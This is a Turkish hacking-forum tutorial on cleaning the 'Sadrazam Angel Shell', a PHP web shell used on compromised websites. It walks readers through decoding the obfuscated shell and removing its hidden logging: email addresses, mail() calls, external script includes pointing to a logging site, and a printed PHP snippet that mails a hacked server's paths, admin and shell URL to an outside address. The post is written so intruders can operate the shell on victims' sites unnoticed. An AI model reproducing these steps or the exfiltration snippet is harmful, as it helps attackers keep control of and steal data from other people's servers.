Sadrazam Shell'de Log Tespiti ve Log Kaydını Silme Yöntemi

1. Sadrazam Shell'de Log Tespiti ve Log Kaydını Silme Yöntemi Detaylı Resimli Anlatım
2.  
3. Yazar => KingSkrupellos
4.  
5. Konu => https://www.cyberizm.org/cyberizm-sadrazam-shell-de-log-tespiti-ve-log-kaydini-silme-yontemi-detayli-resimli-anlatim.html
6.  
7. Öncelikle Selamün Aleyküm Sayın Deccal Dijital Güvenlik Teknoloji Ordusu Tarikatı. Ben KingSkrupellos, yine size hacking konularından '' Sadrazam Angel Shell'de konulmuş Log Kayıtları nasıl bulunur ve temizlenir '' adıyla bir konu açmak aklıma geldi. 
8.  
9. Hiç Sadrazam Angel Shell Görmedim Diyenler için Ekran Görüntüsü Verelim :) 
10. Görenlerde baksın canım, o kadar da değil yani haa :D
11.  
12. [img]http://i.hizliresim.com/OE9aGZ.jpg[/img]
13.  
14. Şimdi bu Shell'in PHP Kodlamasına Giriyoruz ve Metin Belgesi açıp kodları çok kısa bir şekilde düzenliyoruz.
15.  
16. Herşeyden Önce Bazı Akıllı Hacker Arkadaşlar, Sadrazam Angel Shellimizi PHP Encode yapıyorlar. Yani PHP Kodunu gizliyorlar.
17.  
18. Şu Şekilde => 
19.  
20. [img]http://i.hizliresim.com/vZ8N74.png[/img]
21.  
22. Bizde Aşağıdaki yapacağımız işlemleri yapmadan önce Sadrazam Shellimizi PHP Decode etmemiz gerekiyor. Yani Kodları orjinal haline getirmemiz gerekiyor.
23.  
24. Şu Şekilde => 
25.  
26. [img]http://i.hizliresim.com/Xdq3RD.png[/img]
27.  
28. PHP Decoder Yapabilen Güzel İki Sitemiz Var - Bunlardan yararlanabiliriz.
29.  
30. [code]https://www.unphp.net
31. http://toolki.com/en/php-decoder/
32. https://pr.gg/base64/[/code]
33.  
34. [img]http://i.hizliresim.com/nEmNoM.png[/img]
35.  
36. [img]http://i.hizliresim.com/LQgR0Z.png[/img]
37.  
38. [img]http://i.hizliresim.com/1NDZ0N.png[/img]
39.  
40. [hide]1 )  CTRL + F tuşlarına basıp ARAMA yapacağız
41.  
42. 2) @ işareti @hotmail  @yahoo @gmail  gibi yazıları taratacaz eğer bulursak, bunun bulunduğu Mail Adresi Olanları Silecez.
43.  
44. 3) mail(  ve  mail)  gibi olan kelimeleri taratacaz, eğer bulursak silecez.
45.  
46. 4) .js  nokta js gibi olan kodlar direk log tutuyor demektir. Peki her .js log olmayabilir. Bunun anlamının en kısa yolu 
47.  
48. [code]<SCRIPT SRC=http://www.LOG-TUTAN-SİTE/dex.js></SCRIPT>[/code]   
49.  
50. dex.js yerine başka birşey yazabilir.  deccal.js olsun mesela.   
51.  
52. 5) Son Olarakta herşeyi yaptık bulamadık ama yine bazı akıllı hacker arkadaşlar, Sadrazam Angel Shell'in Sonuna 
53.  
54. [code]<?php
55. $kime="HEDEF-EMAİL-ADRESİ@hotmail.com";
56. $baslik="SadrazaM Server Avcisi V1.0";
57. $deccal.="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
58. $deccal.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
59. $deccal.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
60. $deccal.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
61. $deccal.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
62. mail($kime, $baslik, $deccal);
63. ?>[/code]
64.  
65. şeklinde kodlama yapıyorlar, bunu <?php yazan yerden ?> yere kadar siliniz. Burası Hedef Email Adresine sizin hekleyip uğraştığınız 
66. siteyi kolay yoldan shell sahibi olmak isteyenlerin email adresine gidiyor maalesef.[/hide]
67.  
68. 6) Tüm Bu Denilenleri yaptığınız takdirde Sadrazam Shell'de Loglar ( Kayıtlar ) silinmiş olacaktır. Ve Siz Shellinizi gönül rahatlığıyla kullanabilirsiniz :)
69.  
70. Emeğe Saygı. Deccal.Org Digital Security Technological Army. Mr. KingSkrupellos. Selam ve Duam ile :)